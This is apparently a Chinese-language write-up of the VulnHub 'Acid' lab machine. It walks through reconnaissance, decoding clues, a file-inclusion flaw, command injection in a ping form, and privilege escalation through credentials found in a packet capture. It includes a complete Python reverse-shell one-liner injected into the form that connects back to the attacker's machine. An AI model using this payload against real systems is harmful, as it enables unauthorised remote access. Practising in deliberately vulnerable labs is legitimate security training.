vulnhub靶场，-Acid

vulnhub靶场，-Acid

环境准备

靶机下载地址：https://www.vulnhub.com/entry/acid-server,125/
攻击机：kali（192.168.109.128）
靶机：-Acid（192.168.109.149）
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境，启动即可，将网段设置为NAT模式

信息收集

使用arp-scan确定目标靶机

确定目标靶机IP为192.168.109.149
使用nmap扫描查看目标靶机端口开放情况

开放端口：33447
但是发现这个端口是一个http端口，所以使用浏览器访问一下

可以看到网站就只有一张纯静态的图片
网站指纹识别

查看网站源码没有发现什么，但是查看网站元素时发现一串16进制编码

先使用ascii码解密，再使用base64解密

解密出来发现好像是一张图片格式，说明这个网页可能存在这张图片
试着去访问

看来应该不在这个路径下面，根据做vulnhub靶机的经验，猜测图片可能是放在了images路径下面，访问试试

猜测成功，将这张图片下载下来，使用notepad++打开看看

在最下面发现了一串奇怪的数字，猜测是ascii码，将中间的冒号全部去掉使用ascii解密

得到32位的md5值，再使用md5进行解密

得到一个五位数的数字，但是不知道到底用什么用，先放着试试
使用dirb进行网站目录结构扫描

渗透过程

使用dirb进行扫描发现了很多目录，访问Challenge/index.php

是一个登入页面，尝试使用暴力破解发现无效
访问Challenge/error.php,页面显示发生错误

访问Challenge/include.php

这里说输入file名字，file？？？，瞬间想到文件包含漏洞，试一下是否真的存在

可以看到这里确实是存在文件包含漏洞的，但是没有文件上传的位置，所以还是要想想别的办法
访问Challenge/hacked.php

这里有一个输入id的功能，前面我们有一串数字还没有用过，所以在这里输入63425试试

但是好像还是没有啥用
访问Challenge/cake.php

这里提醒说还有很长的路要走，这里发现有一个问题，就是访问Challenge/cake.php时，发现页面的title为/Magic_Box

说明可能是有这个页面的，访问试试

说的是没有权限访问这个页面，说明还是有这个页面的，再次使用dirb进行目录爆破

访问/Challenge/Magic_Box/proc，还是没有权限访问

访问/Challenge/Magic_Box/low.php，页面为空，访问源代码发现也为空
访问/Challenge/Magic_Box/command.php

这里说要我们输入要ping的IP地址，试一试

查看源代码发现是执行成功了的，那是不是也可以使用拼接符号执行我们想执行的命令呢，试试能不能查看当前目录下的所有文件

发现确实成功了，所以这里是存在一个命令注入漏洞的，所以可以去想办法去反弹shell了
查看目标靶机是否安装了python

可以看到安装了python，那就可以利用python去反弹一个shell了
这里显然长度是不够的，但是这里是前端验证，直接去修改他就行了

127.0.0.1;python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.109.128",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

kali终端：

浏览器点击submit提交，可以看到kali这边成功反弹一个shell

提权过程

查看用户的sudo权限，没有密码，不让看

查看用户的suid权限，没有啥可利用的

查看当前用户的下的所有文件

发现好像有一个流量包，靶机上没有wireshark，所以把这个流量包下载到kali上面，进入/sbin/raw_vs_isi/目录，使用python创建一个临时http服务

将流量包下载到kali本地

使用wireshark打开流量包，只查找tcp协议的数据

可以看到是存在一个账号密码的
使用su命令切换到saman用户

查看用户的sudo权限，可以看到是具有全部的权限

所以直接使用sudo -i提权，成功提升为root权限，切换至其root目录，成功获得flag，至此，靶机-Acid渗透结束